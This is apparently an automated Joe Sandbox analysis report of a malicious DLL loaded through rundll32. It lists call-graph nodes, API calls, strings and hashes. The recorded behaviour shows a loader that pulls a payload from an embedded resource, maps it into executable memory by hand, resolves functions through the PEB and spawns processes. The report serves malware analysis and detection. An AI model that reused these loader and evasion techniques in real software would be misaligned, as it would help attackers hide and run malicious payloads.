31914->31917 31918 10030a7e GetProcessHeap HeapFree 31914->31918 31994 10035135 6 API calls __decode_pointer 31915->31994 31916->31913 32029 10035425 79 API calls 2 library calls 31916->32029 31920 10030ab5 31917->31920 31918->31913 31984 10036624 HeapCreate 31920->31984 31921->31913 32011 100389ee 68 API calls ___freetlocinfo 31921->32011 31922 10030ba6 31995 10035840 31922->31995 31927 10030aeb 31927->31913 31930 10030af4 31927->31930 32001 1003548e 78 API calls 6 library calls 31930->32001 31931 10030b90 32012 10035178 70 API calls 2 library calls 31931->32012 31932 10030bbe 32014 100350ae TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 31932->32014 31936 10030af9 __RTC_Initialize 31939 10030afd 31936->31939 31942 10030b0c GetCommandLineA 31936->31942 31937 10030b95 32013 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31937->32013 31938 10030bd0 31943 10030bd7 31938->31943 31944 10030bee 31938->31944 32002 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31939->32002 32003 10038d66 77 API calls 3 library calls 31942->32003 32015 100351b5 67 API calls 4 library calls 31943->32015 32016 1002fa69 31944->32016 31948 10030b1c 32004 100387ae 72 API calls 3 library calls 31948->32004 31950 10030bde GetCurrentThreadId 31950->31913 31951 10030b26 31952 10030b2a 31951->31952 32006 10038cad 111 API calls 3 library calls 31951->32006 32005 10035178 70 API calls 2 library calls 31952->32005 31955 10030b36 31956 10030b4a 31955->31956 32007 10038a3a 110 API calls 6 library calls 31955->32007 31961 10030b02 31956->31961 32009 100389ee 68 API calls ___freetlocinfo 31956->32009 31959 10030b3f 31959->31956 32008 10030f4d 75 API calls 3 library calls 31959->32008 31961->31913 32055 10006a90 31962->32055 31965 1001265a 32089 1002fe65 105 API calls 6 library calls 31965->32089 31966 1001261c FindResourceW LoadResource SizeofResource 31969 10006a90 ___DllMainCRTStartup 67 API calls 31966->31969 31972 10012744 ___DllMainCRTStartup 31969->31972 31971 1001284d 31971->31901 31971->31903 31973 100127b7 VirtualAlloc 31972->31973 31974 1001279b VirtualAllocExNuma 31972->31974 31975 100127da 31973->31975 31974->31975 32060 1002fb00 31975->32060 31979 100127fa 32083 10002970 31979->32083 31981 10012810 ___DllMainCRTStartup 32086 100026a0 31981->32086 31983 10012664 32090 1002f81e 5 API calls __invoke_watson 31983->32090 31985 10036647 31984->31985 31986 10036644 31984->31986 32030 100365c9 67 API calls 2 library calls 31985->32030 31986->31927 31988 1003664c 31989 10036656 31988->31989 31990 1003667a 31988->31990 32031 10035aca HeapAlloc 31989->32031 31990->31927 31992 10036660 31992->31990 31993 10036665 HeapDestroy 31992->31993 31993->31986 31994->31922 31998 10035844 31995->31998 31997 10030bb2 31997->31913 31997->31932 31998->31997 31999 10035864 Sleep 31998->31999 32032 10030678 31998->32032 32000 10035879 31999->32000 32000->31997 32000->31998 32001->31936 32002->31961 32003->31948 32004->31951 32005->31939 32006->31955 32007->31959 32008->31956 32009->31952 32010->31921 32011->31931 32012->31937 32013->31913 32014->31938 32015->31950 32018 1002fa75 __msize 32016->32018 32017 1002faee __expand __msize 32017->31961 32018->32017 32028 1002fab4 32018->32028 32051 10035a99 67 API calls 2 library calls 32018->32051 32019 1002fac9 HeapFree 32019->32017 32021 1002fadb 32019->32021 32054 100311f4 67 API calls __getptd_noexit 32021->32054 32023 1002fae0 GetLastError 32023->32017 32024 1002faa6 32053 1002fabf LeaveCriticalSection _doexit 32024->32053 32025 1002fa8c ___sbh_find_block 32025->32024 32052 10035b3d VirtualFree VirtualFree HeapFree ___sbh_free_block 32025->32052 32028->32017 32028->32019 32029->31913 32030->31988 32031->31992 32033 10030684 __msize 32032->32033 32034 1003069c 32033->32034 32044 100306bb _memset 32033->32044 32045 100311f4 67 API calls __getptd_noexit 32034->32045 32036 100306a1 32046 10037753 4 API calls 2 library calls 32036->32046 32037 1003072d RtlAllocateHeap 32037->32044 32038 100306b1 __msize 32038->31998 32044->32037 32044->32038 32047 10035a99 67 API calls 2 library calls 32044->32047 32048 100362e6 5 API calls 2 library calls 32044->32048 32049 10030774 LeaveCriticalSection _doexit 32044->32049 32050 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32044->32050 32045->32036 32047->32044 32048->32044 32049->32044 32050->32044 32051->32025 32052->32024 32053->32028 32054->32023 32056 1002f9a6 _malloc 67 API calls 32055->32056 32057 10006aa1 32056->32057 32058 1002fa69 ___freetlocinfo 67 API calls 32057->32058 32059 10006aad 32057->32059 32058->32059 32059->31965 32059->31966 32061 1002fb18 32060->32061 32062 1002fb3f __VEC_memcpy 32061->32062 32063 100127eb 32061->32063 32062->32063 32064 1002f9a6 32063->32064 32065 1002fa53 32064->32065 32076 1002f9b4 32064->32076 32098 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32065->32098 32067 1002fa59 32099 100311f4 67 API calls __getptd_noexit 32067->32099 32070 1002fa5f 32070->31979 32073 1002fa17 RtlAllocateHeap 32073->32076 32074 1002f9c9 32074->32076 32091 10036892 67 API calls __NMSG_WRITE 32074->32091 32092 100366f2 67 API calls 7 library calls 32074->32092 32093 10030e7b GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 32074->32093 32076->32073 32076->32074 32077 1002fa3e 32076->32077 32080 1002fa3c 32076->32080 32082 1002fa4a 32076->32082 32094 1002f957 67 API calls 4 library calls 32076->32094 32095 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32076->32095 32096 100311f4 67 API calls __getptd_noexit 32077->32096 32097 100311f4 67 API calls __getptd_noexit 32080->32097 32082->31979 32084 1002f9a6 _malloc 67 API calls 32083->32084 32085 10002990 32084->32085 32085->31981 32100 10002280 32086->32100 32089->31983 32090->31971 32091->32074 32092->32074 32094->32076 32095->32076 32096->32080 32097->32082 32098->32067 32099->32070 32137 10001990 32100->32137 32103 100022c3 SetLastError 32134 100022a9 32103->32134 32104 100022d5 32105 10001990 ___DllMainCRTStartup SetLastError 32104->32105 32106 100022ee 32105->32106 32107 10002310 SetLastError 32106->32107 32108 10002322 32106->32108 32106->32134 32107->32134 32109 10002331 SetLastError 32108->32109 32110 10002343 32108->32110 32109->32134 32111 1000234e SetLastError 32110->32111 32113 10002360 GetNativeSystemInfo 32110->32113 32111->32134 32114 10002414 SetLastError 32113->32114 32115 10002426 VirtualAlloc 32113->32115 32114->32134 32116 10002472 GetProcessHeap HeapAlloc 32115->32116 32117 10002447 VirtualAlloc 32115->32117 32119 100024ac 32116->32119 32120 1000248c VirtualFree SetLastError 32116->32120 32117->32116 32118 10002463 SetLastError 32117->32118 32118->32134 32121 10001990 ___DllMainCRTStartup SetLastError 32119->32121 32120->32134 32122 1000250e 32121->32122 32123 10002512 32122->32123 32124 1000251c VirtualAlloc 32122->32124 32175 10002840 VirtualFree VirtualFree GetProcessHeap HeapFree ___DllMainCRTStartup 32123->32175 32125 1000254b ___DllMainCRTStartup 32124->32125 32140 100019c0 32125->32140 32128 1000257f ___DllMainCRTStartup 32128->32123 32150 10001ff0 32128->32150 32132 100025e8 ___DllMainCRTStartup 32132->32123 32132->32134 32169 77e991 32132->32169 32134->31983 32135 1000264f SetLastError 32135->32123 32138 100019ab 32137->32138 32139 1000199f SetLastError 32137->32139 32138->32103 32138->32104 32138->32134 32139->32138 32144 100019f0 32140->32144 32141 10001a83 32142 10001990 ___DllMainCRTStartup SetLastError 32141->32142 32147 10001a9c 32142->32147 32143 10001a2c VirtualAlloc 32145 10001a50 32143->32145 32146 10001a57 ___DllMainCRTStartup 32143->32146 32144->32141 32144->32143 32149 10001aa0 ___DllMainCRTStartup 32144->32149 32145->32149 32146->32144 32148 10001aa4 VirtualAlloc 32147->32148 32147->32149 32148->32149 32149->32128 32151 10002029 IsBadReadPtr 32150->32151 32160 1000201f 32150->32160 32153 10002053 32151->32153 32151->32160 32154 10002085 SetLastError 32153->32154 32155 10002099 32153->32155 32153->32160 32154->32160 32176 100018b0 VirtualQuery VirtualFree VirtualAlloc ___DllMainCRTStartup 32155->32176 32157 100020b3 32158 100020bf SetLastError 32157->32158 32162 100020e9 32157->32162 32158->32160 32160->32123 32163 10001cb0 32160->32163 32161 100021f9 SetLastError 32161->32160 32162->32160 32162->32161 32167 10001cf8 ___DllMainCRTStartup 32163->32167 32164 10001e01 32165 10001b80 ___DllMainCRTStartup 2 API calls 32164->32165 32168 10001ddd 32165->32168 32167->32164 32167->32168 32177 10001b80 32167->32177 32168->32132 32170 77ea62 32169->32170 32171 77ea8d 32169->32171 32184 77f8fd 32170->32184 32171->32134 32171->32135 32175->32134 32176->32157 32178 10001b9c 32177->32178 32179 10001b92 32177->32179 32181 10001c04 VirtualProtect 32178->32181 32182 10001baa 32178->32182 32179->32167 32181->32179 32182->32179 32183 10001be2 VirtualFree 32182->32183 32183->32179 32195 77fde0 32184->32195 32186 77ffd1 32208 77ab87 32186->32208 32188 77ea75 32188->32171 32197 7793ed 32188->32197 32193 78dcf7 GetPEB 32193->32195 32194 77a8b0 GetPEB 32194->32195 32195->32186 32195->32188 32195->32193 32195->32194 32200 77b23c 32195->32200 32204 7846bb 32195->32204 32218 78da22 GetPEB 32195->32218 32219 7747ce GetPEB 32195->32219 32220 77f899 GetPEB 32195->32220 32221 774b61 32195->32221 32198 78aa30 GetPEB 32197->32198 32199 779456 ExitProcess 32198->32199 32199->32171 32201 77b254 32200->32201 32225 78aa30 32201->32225 32205 7846da 32204->32205 32206 78aa30 GetPEB 32205->32206 32207 784729 SHGetFolderPathW 32206->32207 32207->32195 32209 77abb0 32208->32209 32210 774b61 GetPEB 32209->32210 32211 77ad67 32210->32211 32233 777f5d 32211->32233 32213 77ada4 32213->32188 32214 77ad99 32214->32213 32237 781e67 GetPEB 32214->32237 32216 77adc4 32238 781e67 GetPEB 32216->32238 32218->32195 32219->32195 32220->32195 32222 774b74 32221->32222 32239 771ea7 32222->32239 32226 78ab1d 32225->32226 32227 77b2b8 lstrcmpiW 32225->32227 32231 780a0e GetPEB 32226->32231 32227->32195 32229 78ab33 32232 77cdcd GetPEB 32229->32232 32231->32229 32232->32227 32234 777f8e 32233->32234 32235 78aa30 GetPEB 32234->32235 32236 777fd4 CreateProcessW 32235->32236 32236->32214 32237->32216 32238->32213 32240 771ebc 32239->32240 32243 77702c 32240->32243 32244 777049 32243->32244 32245 78aa30 GetPEB 32244->32245 32246 771f4c 32245->32246 32246->32195

                                                                                                                                  Executed Functions

                                                                                                                                  Function 100125C0 Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 165memoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                                  • _printf.LIBCMT ref: 1001265F
                                                                                                                                  • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                                  • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                                  • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                                  • _malloc.LIBCMT ref: 100127F5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.503146920.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.503139641.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503274331.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503282284.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503287724.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503294587.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                                  • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                                  • API String ID: 572389289-2839844625
                                                                                                                                  • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                                  • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
                                                                                                                                  • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                                  • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10002280 Relevance: 22.8, APIs: 15, Instructions: 331COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 36 10002280-100022a7 call 10001990 39 100022b0-100022c1 36->39 40 100022a9-100022ab 36->40 42 100022c3-100022d0 SetLastError 39->42 43 100022d5-100022f0 call 10001990 39->43 41 1000269a-1000269d 40->41 42->41 46 100022f2-100022f4 43->46 47 100022f9-1000230e 43->47 46->41 48 10002310-1000231d SetLastError 47->48 49 10002322-1000232f 47->49 48->41 50 10002331-1000233e SetLastError 49->50 51 10002343-1000234c 49->51 50->41 52 10002360-10002381 51->52 53 1000234e-1000235b SetLastError 51->53 54 10002395-1000239f 52->54 53->41 55 100023a1-100023a8 54->55 56 100023d7-10002412 GetNativeSystemInfo 54->56 57 100023b8-100023c4 55->57 58 100023aa-100023b6 55->58 59 10002414-10002421 SetLastError 56->59 60 10002426-10002445 VirtualAlloc 56->60 61 100023c7-100023cd 57->61 58->61 59->41 62 10002472-1000248a GetProcessHeap HeapAlloc 60->62 63 10002447-10002461 VirtualAlloc 60->63 64 100023d5 61->64 65 100023cf-100023d2 61->65 67 100024ac-10002510 call 10001990 62->67 68 1000248c-100024a7 VirtualFree SetLastError 62->68 63->62 66 10002463-1000246d SetLastError 63->66 64->54 65->64 66->41 72 10002512 67->72 73 1000251c-10002581 VirtualAlloc call 10001810 call 100019c0 67->73 68->41 74 1000268c-10002698 call 10002840 72->74 81 10002583 73->81 82 1000258d-1000259e 73->82 74->41 81->74 83 100025a0-100025b6 call 10001eb0 82->83 84 100025b8-100025bb 82->84 86 100025c2-100025d0 call 10001ff0 83->86 84->86 90 100025d2 86->90 91 100025dc-100025ea call 10001cb0 86->91 90->74 94 100025f6-10002604 call 10001e30 91->94 95 100025ec 91->95 98 10002606 94->98 99 1000260d-10002616 94->99 95->74 98->74 100 10002618-1000261f 99->100 101 1000267d-10002680 99->101 103 10002621-10002643 call 77e991 100->103 104 1000266a-10002678 100->104 102 10002687-1000268a 101->102 102->41 106 10002646-1000264d 103->106 105 1000267b 104->105 105->102 107 1000265e-10002668 106->107 108 1000264f-1000265a SetLastError 106->108 107->105 108->74
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                                  • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.503146920.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.503139641.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503274331.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503282284.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503287724.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503294587.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                  • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                  • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                                  • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                  • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10006A90 Relevance: 18.4, APIs: 1, Instructions: 16933COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                                  APIs
                                                                                                                                  • _malloc.LIBCMT ref: 10006A9C
                                                                                                                                    • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                                    • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                                    • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.503146920.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.503139641.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503274331.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503282284.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503287724.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503294587.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap_malloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 501242067-0
                                                                                                                                  • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                  • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                                  • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                  • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1002083B Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                                  • GlobalHandle.KERNEL32(00207AD0), ref: 100208A9
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                                  • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                                  • GlobalHandle.KERNEL32(00207AD0), ref: 100208DB
                                                                                                                                  • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                                  • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                                  • _memset.LIBCMT ref: 10020911
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.503146920.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.503139641.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503274331.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503282284.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503287724.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503294587.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 496899490-0
                                                                                                                                  • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                  • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                                  • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                  • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1002FA69 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • __lock.LIBCMT ref: 1002FA87
                                                                                                                                    • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                                    • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                                    • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                                  • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                                  • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                                  • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.503146920.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.503139641.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503274331.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503282284.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503287724.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503294587.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2714421763-0
                                                                                                                                  • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                  • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                                  • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                  • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10036624 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                                  APIs
                                                                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                                  • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.503146920.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.503139641.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503274331.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503282284.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503287724.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.503294587.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CreateDestroy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3296620671-0
                                                                                                                                  • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                  • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                                  • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                  • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100019C0 Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
